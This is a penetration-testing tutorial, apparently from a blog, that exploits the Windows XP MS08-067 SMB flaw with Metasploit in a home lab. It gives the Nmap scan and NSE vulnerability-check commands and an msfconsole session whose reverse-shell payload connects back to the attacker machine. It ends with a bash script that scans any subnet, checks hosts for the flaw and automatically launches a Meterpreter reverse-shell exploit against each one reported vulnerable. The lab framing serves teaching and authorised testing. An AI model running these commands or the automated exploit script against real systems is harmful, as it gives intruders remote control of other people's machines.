Most of us have heard of the Metasploit Framework from Rapid7. In this post we will use it to exploit a well-known Microsoft Windows XP vulnerability, MS08-067 (CVE-2008-4250), a flaw in the Server service that is reachable over SMB, and gain full control of the Windows machine.
Lab Setup:
Target: Windows XP SP2 (IP Address) --> 192.168.43.86
Attacker: Kali machine (IP Address) --> 192.168.43.76
We have installed Windows XP SP2 and our attacking machine, Kali Linux, as VirtualBox VMs and given both bridged networking so that they sit on the same Wi-Fi network. Kali must be able to reach the target on TCP 445, and the target must be able to connect back to Kali, because the payload used later is a reverse shell.
A quick Nmap scan of the network for the Windows RPC and SMB ports gives us the victim's IP. As we can see below, the Windows XP host has ports 135 (MSRPC endpoint mapper) and 445 (SMB over TCP) open. MS08-067 is triggered through the SRVSVC RPC interface, which the exploit reaches over SMB on port 445 (or 139). In the command, -Pn skips host discovery, -sS does a SYN scan (it needs root) and -sV fingerprints the services.
root@PenTestPundit:~# nmap -Pn -sS -sV -p 135,445 192.168.43.0/24
Next we run the Nmap NSE script that tests whether the host is vulnerable to MS08-067 (netapi). Port 445 must be part of the scan (it is in Nmap's default port set, but adding -p445 makes that explicit). The script's own documentation warns that the check may crash the target, so run it only against lab machines.
root@PenTestPundit:~# nmap -Pn --script smb-vuln-ms08-067.nse 192.168.43.86
As we can see, our victim is vulnerable. Now we fire up the Metasploit console for the exploitation part. First we start the PostgreSQL service that backs the Metasploit database (it stores the workspace's hosts, services and loot; msfconsole also runs without it), followed by the msfconsole command.
root@Pentest-Pundit:~# service postgresql start
root@Pentest-Pundit:~# msfconsole
Once msfconsole is up, we select the MS08-067 module, set a payload, and set LHOST to our Kali IP address and RHOST to the victim's IP address. The transcript below uses windows/shell/reverse_tcp, a staged payload that returns a plain cmd.exe shell; to get a Meterpreter session instead (required for commands such as sysinfo) use set payload windows/meterpreter/reverse_tcp. On current Metasploit versions the option is named RHOSTS, with RHOST still accepted as an alias. The module fingerprints the target's OS and language pack to pick the right return address; if that fails, list the targets with show targets and set one by hand. The exploit is effectively one shot, since a wrong target can crash the Server service, so it is worth running check before exploit.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.43.76
LHOST => 192.168.43.76
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.43.86
RHOST => 192.168.43.86
msf exploit(windows/smb/ms08_067_netapi) > exploit
After successful exploitation a session opens. In a Meterpreter session, sysinfo prints the target's computer name, OS version and architecture, and from there we can do whatever the payload offers us. In the plain command shell from windows/shell/reverse_tcp the equivalent is the Windows commands ver or systeminfo.
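As an added example (not code from the original post), the whole procedure above as one shell script: it parses Nmap's grepable output to find hosts with 445 open, runs the MS08-067 NSE check against each, and writes a Metasploit resource file that replays the msfconsole session, using the Meterpreter payload so that sysinfo works in the resulting session. The sample Nmap output is constructed to mirror the lab above; the script name ms08_067_lab.sh, the --run flag and the /tmp paths are my choices, and the live path assumes root (for -sS) and Kali's nmap and msfconsole binaries.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: the scan -> check -> exploit
# steps as shell functions. nmap/msfconsole invocations are the real ones;
# the sample Nmap output below is constructed so the parsing runs offline.
set -u

# Constructed sample of "nmap -oG -" (grepable) output for the lab subnet.
sample_gnmap() {
  printf '# Nmap 7.80 scan initiated as: nmap -Pn -sS -sV -p 135,445 -oG - 192.168.43.0/24\n'
  printf 'Host: 192.168.43.1 ()\tStatus: Up\n'
  printf 'Host: 192.168.43.1 ()\tPorts: 135/closed/tcp//msrpc///, 445/closed/tcp//microsoft-ds///\n'
  printf 'Host: 192.168.43.76 ()\tPorts: 135/closed/tcp//msrpc///, 445/closed/tcp//microsoft-ds///\n'
  printf 'Host: 192.168.43.86 ()\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///\n'
  printf '# Nmap done: 256 IP addresses (3 hosts up) scanned\n'
}

# hosts_with_open_port PORT  <grepable-output
# Prints the IP of every host whose tab-separated "Ports:" field lists PORT as open.
hosts_with_open_port() {
  awk -F '\t' -v want="$1" '
    /^Host:/ {
      split($1, h, " ")                       # "Host: 1.2.3.4 ()" -> h[2] is the IP
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        n = split(substr($i, 8), p, ", ")     # entries like "445/open/tcp//microsoft-ds///"
        for (j = 1; j <= n; j++) {
          split(p[j], q, "/")                 # q[1]=port, q[2]=state
          if (q[1] == want && q[2] == "open") { print h[2]; break }
        }
      }
    }'
}

# make_msf_rc RHOST LHOST PAYLOAD
# Emits a Metasploit resource script equivalent to the interactive session
# above. "check" runs the module's vulnerability check first; "exploit -z"
# leaves the new session in the background instead of dropping into it.
make_msf_rc() {
  cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $1
set LHOST $2
set payload $3
check
exploit -z
EOF
}

# run_lab CIDR LHOST  -- the live version: needs root (for -sS) and Kali's tools.
# Assumption: the NSE script reports hits as "State: VULNERABLE" (Nmap vulns library format).
run_lab() {
  cidr=$1; lhost=$2
  nmap -Pn -sS -sV -p 139,445 -oG - "$cidr" | hosts_with_open_port 445 |
  while read -r rhost; do
    if nmap -Pn -p445 --script smb-vuln-ms08-067 "$rhost" | grep -q 'State: VULNERABLE'; then
      rc="/tmp/ms08_067_${rhost}.rc"
      make_msf_rc "$rhost" "$lhost" windows/meterpreter/reverse_tcp > "$rc"
      msfconsole -q -r "$rc"
    else
      echo "$rhost: SMB open but not reported vulnerable, skipping" >&2
    fi
  done
}

# Only touch the network when asked explicitly (hypothetical file name):
#   sudo ./ms08_067_lab.sh --run 192.168.43.0/24 192.168.43.76
if [ "${1:-}" = "--run" ]; then
  run_lab "$2" "$3"
fi
```

When the resource file finishes, msfconsole stays open with the session in the background; sessions -l lists it and sessions -i 1 attaches, after which sysinfo works as described above. Sourcing the file without --run only defines the functions, which is what lets the parsing be checked against the constructed sample without touching any host.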